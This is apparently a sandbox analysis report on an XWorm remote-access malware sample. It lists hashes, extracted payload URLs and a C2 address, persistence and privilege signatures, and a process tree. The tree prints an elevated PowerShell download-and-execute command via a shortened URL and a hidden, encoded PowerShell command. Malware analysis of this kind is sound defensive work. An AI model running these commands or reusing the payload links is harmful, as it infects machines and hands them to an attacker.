Analysis
-
max time kernel
299s -
max time network
298s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-01-2025 07:16
Static task
static1
General
-
Target
New Text Document.txt
-
Size
261B
-
MD5
b7d1dea96fc88cf58391d928a3558e32
-
SHA1
c4a5be1b46c579c8405006c7da0b672181e90403
-
SHA256
7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576
-
SHA512
08b08f2bf4f735c673f550c432badcf42e625e240971b78b8dc5d5c43f48076196aac44926882e4e0483f122a32c6633b6d57467e05ffe30fd5ee4190c351572
Malware Config
Extracted
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/Discord.exe
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/GoogleChrome.exe
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/explorer.exe
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/svchost.exe
Extracted
xworm
147.185.221.24:35724
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x00280000000462bd-294.dat family_xworm behavioral1/memory/5288-304-0x0000000000A20000-0x0000000000A36000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 35 4860 powershell.exe 37 4860 powershell.exe 61 2480 powershell.exe 62 2480 powershell.exe -
pid Process 1600 PowerShell.exe 4860 powershell.exe 5232 powershell.exe 5596 powershell.exe 5744 powershell.exe 5652 powershell.exe 5928 powershell.exe 5232 powershell.exe 6008 powershell.exe 5348 powershell.exe 5884 powershell.exe 2480 powershell.exe 5232 powershell.exe 5596 powershell.exe 5744 powershell.exe 6008 powershell.exe 5348 powershell.exe 3964 powershell.exe 4788 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\Control Panel\International\Geo\Nation Discord.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Discord.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Discord.exe -
Executes dropped EXE 5 IoCs
pid Process 5288 Discord.exe 5780 Discord 5652 Discord 2952 Discord 728 Discord -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord" Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 36 raw.githubusercontent.com 37 raw.githubusercontent.com 62 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 68 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk PowerShell.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250124071739.pma setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\945a91fc-a6df-4ea9-9d59-7a6f0ab929fa.tmp setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5920 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 1600 PowerShell.exe 1600 PowerShell.exe 1600 PowerShell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe 3152 msedge.exe 3152 msedge.exe 4788 powershell.exe 4788 powershell.exe 2092 msedge.exe 2092 msedge.exe 4788 powershell.exe 2480 powershell.exe 2480 powershell.exe 2480 powershell.exe 5232 powershell.exe 5232 powershell.exe 5232 powershell.exe 5596 powershell.exe 5596 powershell.exe 5596 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 6008 powershell.exe 6008 powershell.exe 6008 powershell.exe 5348 powershell.exe 5348 powershell.exe 5412 identity_helper.exe 5412 identity_helper.exe 5348 powershell.exe 5884 powershell.exe 5884 powershell.exe 5884 powershell.exe 5652 powershell.exe 5652 powershell.exe 5652 powershell.exe 5928 powershell.exe 5928 powershell.exe 5928 powershell.exe 5232 powershell.exe 5232 powershell.exe 5232 powershell.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1600 PowerShell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 5232 powershell.exe Token: SeIncreaseQuotaPrivilege 5232 powershell.exe Token: SeSecurityPrivilege 5232 powershell.exe Token: SeTakeOwnershipPrivilege 5232 powershell.exe Token: SeLoadDriverPrivilege 5232 powershell.exe Token: SeSystemProfilePrivilege 5232 powershell.exe Token: SeSystemtimePrivilege 5232 powershell.exe Token: SeProfSingleProcessPrivilege 5232 powershell.exe Token: SeIncBasePriorityPrivilege 5232 powershell.exe Token: SeCreatePagefilePrivilege 5232 powershell.exe Token: SeBackupPrivilege 5232 powershell.exe Token: SeRestorePrivilege 5232 powershell.exe Token: SeShutdownPrivilege 5232 powershell.exe Token: SeDebugPrivilege 5232 powershell.exe Token: SeSystemEnvironmentPrivilege 5232 powershell.exe Token: SeRemoteShutdownPrivilege 5232 powershell.exe Token: SeUndockPrivilege 5232 powershell.exe Token: SeManageVolumePrivilege 5232 powershell.exe Token: 33 5232 powershell.exe Token: 34 5232 powershell.exe Token: 35 5232 powershell.exe Token: 36 5232 powershell.exe Token: SeDebugPrivilege 5596 powershell.exe Token: SeIncreaseQuotaPrivilege 5596 powershell.exe Token: SeSecurityPrivilege 5596 powershell.exe Token: SeTakeOwnershipPrivilege 5596 powershell.exe Token: SeLoadDriverPrivilege 5596 powershell.exe Token: SeSystemProfilePrivilege 5596 powershell.exe Token: SeSystemtimePrivilege 5596 powershell.exe Token: SeProfSingleProcessPrivilege 5596 powershell.exe Token: SeIncBasePriorityPrivilege 5596 powershell.exe Token: SeCreatePagefilePrivilege 5596 powershell.exe Token: SeBackupPrivilege 5596 powershell.exe Token: SeRestorePrivilege 5596 powershell.exe Token: SeShutdownPrivilege 5596 powershell.exe Token: SeDebugPrivilege 5596 powershell.exe Token: SeSystemEnvironmentPrivilege 5596 powershell.exe Token: SeRemoteShutdownPrivilege 5596 powershell.exe Token: SeUndockPrivilege 5596 powershell.exe Token: SeManageVolumePrivilege 5596 powershell.exe Token: 33 5596 powershell.exe Token: 34 5596 powershell.exe Token: 35 5596 powershell.exe Token: 36 5596 powershell.exe Token: SeDebugPrivilege 5744 powershell.exe Token: SeIncreaseQuotaPrivilege 5744 powershell.exe Token: SeSecurityPrivilege 5744 powershell.exe Token: SeTakeOwnershipPrivilege 5744 powershell.exe Token: SeLoadDriverPrivilege 5744 powershell.exe Token: SeSystemProfilePrivilege 5744 powershell.exe Token: SeSystemtimePrivilege 5744 powershell.exe Token: SeProfSingleProcessPrivilege 5744 powershell.exe Token: SeIncBasePriorityPrivilege 5744 powershell.exe Token: SeCreatePagefilePrivilege 5744 powershell.exe Token: SeBackupPrivilege 5744 powershell.exe Token: SeRestorePrivilege 5744 powershell.exe Token: SeShutdownPrivilege 5744 powershell.exe Token: SeDebugPrivilege 5744 powershell.exe Token: SeSystemEnvironmentPrivilege 5744 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2092 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1600 wrote to memory of 4860 1600 PowerShell.exe 102 PID 1600 wrote to memory of 4860 1600 PowerShell.exe 102 PID 4860 wrote to memory of 2092 4860 powershell.exe 105 PID 4860 wrote to memory of 2092 4860 powershell.exe 105 PID 2092 wrote to memory of 1768 2092 msedge.exe 107 PID 2092 wrote to memory of 1768 2092 msedge.exe 107 PID 4860 wrote to memory of 1372 4860 powershell.exe 106 PID 4860 wrote to memory of 1372 4860 powershell.exe 106 PID 1372 wrote to memory of 3976 1372 csc.exe 108 PID 1372 wrote to memory of 3976 1372 csc.exe 108 PID 4860 wrote to memory of 3964 4860 powershell.exe 109 PID 4860 wrote to memory of 3964 4860 powershell.exe 109 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 4012 2092 msedge.exe 110 PID 2092 wrote to memory of 3152 2092 msedge.exe 111 PID 2092 wrote to memory of 3152 2092 msedge.exe 111 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 PID 2092 wrote to memory of 4812 2092 msedge.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\NOTEPAD.EXEC:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"1⤵PID:3684
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -Command "Start-Process PowerShell -ArgumentList 'irm "https://tinyurl.com/4j72ashp/" | iex' -Verb RunAs"1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://tinyurl.com/4j72ashp/ | iex2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://as2.ftcdn.net/v2/jpg/00/53/69/65/1000_F_53696591_9LO1bsQUpl2zIolFMFokrQyt04Z5dzXd.jpg3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb178946f8,0x7ffb17894708,0x7ffb178947184⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:24⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:84⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:14⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:14⤵PID:1560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:84⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
PID:5328 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7408e5460,0x7ff7408e5470,0x7ff7408e54805⤵PID:5720
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:5412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:14⤵PID:5392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:14⤵PID:2068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:14⤵PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:14⤵PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3244 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:3048
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0sb5rtez\0sb5rtez.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF86A.tmp" "c:\Users\Admin\AppData\Local\Temp\0sb5rtez\CSC3A3CAA7EC2D84F19B489B3B43B873448.TMP"4⤵PID:3976
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand p o w e r s h e l l   - N o P r o f i l e   - E x e c u t i o n P o l i c y   B y p a s s   - W i n d o w S t y l e   H i d d e n   - E n c o d e d C o m m a n d   " c A B v A H c A Z Q B y A H M A a A B l A G w A b A A g A C 0 A T g B v A F A A c g B v A G Y A a Q B s A G U A I A A t A E U A e A B l A G M A d Q B 0 A G k A b w B u A F A A b w B s A G k A Y w B 5 A C A A Q g B 5 A H A A Y Q B z A H M A I A A t A F c A a Q B u A G Q A b w B 3 A F M A d A B 5 A G w A Z Q A g A E g A a Q B k A G Q A Z Q B u A C A A L Q B F A G 4 A Y w B v A G Q A Z Q B k A E M A b w B t A G 0 A Y Q B u A G Q A I A A i A G M A Q Q B C A H Y A Q Q B I A G M A Q Q B a A F E A Q g B 5 A E E A S A B N A E E A Y Q B B A E I A b A B B A E c A d w B B A G I A Q Q B B A G c A Q Q B D A D A A Q Q B W A H c A Q g B w A E E A R w A 0 A E E A W g B B A E I A d g B B A E g A Y w B B A F U A d w B C A D A A Q Q B I A G s A Q Q B i A E E A Q g B s A E E A Q w B B A E E A U w B B A E I A c A B B A E c A U Q B B A F o A Q Q B C A G w A Q Q B H A D Q A Q Q B J A E E A Q Q B 0 A E E A R Q B N A E E A Y g B 3 A E I A d A B B A E c A M A B B A F k A U Q B C A H U A Q Q B H A F E A Q Q B J A E E A Q Q B p A E E A R Q B F A E E A W g B B A E I A a w B B A E M A M A B B A F Q A U Q B C A H c A Q Q B G A E E A Q Q B j A G c A Q g B s A E E A R w B Z A E E A W g B R A E I A e Q B B A E c A V Q B B A G I A Z w B C A G o A Q Q B H A F U A Q Q B J A E E A Q Q B 0 A E E A R Q B V A E E A Z Q B B A E I A a g B B A E c A d w B B A G Q A U Q B C A H o A Q Q B H A G s A Q Q B i A H c A Q g B 1 A E E A R g B B A E E A W Q B R A E I A M A B B A E c A Z w B B A E k A Q Q B B A G 4 A Q Q B F A E 0 A Q Q B P A G c A Q g B j A E E A R g B B A E E A Y w B n A E I A d g B B A E c A Y w B B A G M A Z w B C A G g A Q Q B H A D A A Q Q B S A E E A Q g B o A E E A S A B R A E E A W Q B R A E E A b g B B A E M A S Q B B A E M A Z w B C A H c A Q Q B H A D g A Q Q B k A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A b w B B A E c A V Q B B A G I A Q Q B C A H M A Q Q B D A E E A Q Q B M A F E A Q g B Y A E E A R w B r A E E A Y g B n A E I A a w B B A E c A O A B B A G Q A d w B C A F Q A Q Q B I A F E A Q Q B l A F E A Q g B z A E E A R w B V A E E A S Q B B A E I A S Q B B A E c A a w B B A F o A Q Q B C A G s A Q Q B H A F U A Q Q B i A G c A Q Q B n A E E A Q w A w A E E A U Q B 3 A E I A d g B B A E c A M A B B A G I A U Q B C A G g A Q Q B H A D Q A Q Q B a A E E A Q Q B n A E E A Q w B J A E E A U Q B R A E I A a w B B A E c A U Q B B A E w A U Q B C A E 4 A Q Q B I A E E A Q Q B V A E E A Q g B 5 A E E A R w B V A E E A W g B n A E I A b A B B A E g A S Q B B A F o A U Q B C A H U A Q Q B H A E 0 A Q Q B a A F E A Q Q B n A E E A Q w A w A E E A U g B R A E I A N A B B A E c A T Q B B A G I A Q Q B C A D E A Q Q B I A E 0 A Q Q B h A F E A Q g B 2 A E E A R w A 0 A E E A V Q B B A E I A a A B B A E g A U Q B B A G E A Q Q B B A G c A Q Q B D A G M A Q Q B R A H c A Q Q A 2 A E E A R g B 3 A E E A V g B R A E I A e g B B A E c A V Q B B A G M A Z w B C A H o A Q Q B G A H c A Q Q B V A E E A Q g A x A E E A R w B J A E E A Y g B B A E I A c A B B A E c A T Q B B A F g A Q Q B C A E U A Q Q B H A D g A Q Q B k A H c A Q g B 1 A E E A R w B 3 A E E A Y g B 3 A E I A a A B B A E c A U Q B B A G M A d w B B A G 4 A Q Q B D A E k A Q Q B D A G c A Q g B 3 A E E A R w A 4 A E E A Z A B 3 A E I A b A B B A E g A S Q B B A G M A d w B C A G 8 A Q Q B H A F U A Q Q B i A E E A Q g B z A E E A Q w B B A E E A T A B R A E I A W A B B A E c A a w B B A G I A Z w B C A G s A Q Q B H A D g A Q Q B k A H c A Q g B U A E E A S A B R A E E A Z Q B R A E I A c w B B A E c A V Q B B A E k A Q Q B C A E k A Q Q B H A G s A Q Q B a A E E A Q g B r A E E A R w B V A E E A Y g B n A E E A Z w B B A E M A M A B B A F E A d w B C A H Y A Q Q B H A D A A Q Q B i A F E A Q g B o A E E A R w A 0 A E E A W g B B A E E A Z w B B A E M A S Q B B A F E A U Q B C A G s A Q Q B H A F E A Q Q B M A F E A Q g B O A E E A S A B B A E E A V Q B B A E I A e Q B B A E c A V Q B B A F o A Z w B C A G w A Q Q B I A E k A Q Q B a A F E A Q g B 1 A E E A R w B N A E E A W g B R A E E A Z w B B A E M A M A B B A F I A U Q B C A D Q A Q Q B H A E 0 A Q Q B i A E E A Q g A x A E E A S A B N A E E A Y Q B R A E I A d g B B A E c A N A B B A F U A Q Q B C A G g A Q Q B I A F E A Q Q B h A E E A Q Q B n A E E A Q w B j A E E A U Q B 3 A E E A N g B B A E Y A d w B B A F Y A d w B C A H A A Q Q B H A D Q A Q Q B a A E E A Q g B 2 A E E A S A B j A E E A Y w B 3 A E I A Y w B B A E Y A T Q B B A G U A U Q B C A H o A Q Q B I A F E A Q Q B a A F E A Q g B 0 A E E A R A B N A E E A T Q B n A E E A b g B B A E M A S Q B B A E M A Z w B C A H c A Q Q B H A D g A Q Q B k A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A b w B B A E c A V Q B B A G I A Q Q B C A H M A Q Q B D A E E A Q Q B M A F E A Q g B Y A E E A R w B r A E E A Y g B n A E I A a w B B A E c A O A B B A G Q A d w B C A F Q A Q Q B I A F E A Q Q B l A F E A Q g B z A E E A R w B V A E E A S Q B B A E I A S Q B B A E c A a w B B A F o A Q Q B C A G s A Q Q B H A F U A Q Q B i A G c A Q Q B n A E E A Q w A w A E E A U Q B 3 A E I A d g B B A E c A M A B B A G I A U Q B C A G g A Q Q B H A D Q A Q Q B a A E E A Q Q B n A E E A Q w B J A E E A U Q B R A E I A a w B B A E c A U Q B B A E w A U Q B C A E 4 A Q Q B I A E E A Q Q B V A E E A Q g B 5 A E E A R w B V A E E A W g B n A E I A b A B B A E g A S Q B B A F o A U Q B C A H U A Q Q B H A E 0 A Q Q B a A F E A Q Q B n A E E A Q w A w A E E A U g B R A E I A N A B B A E 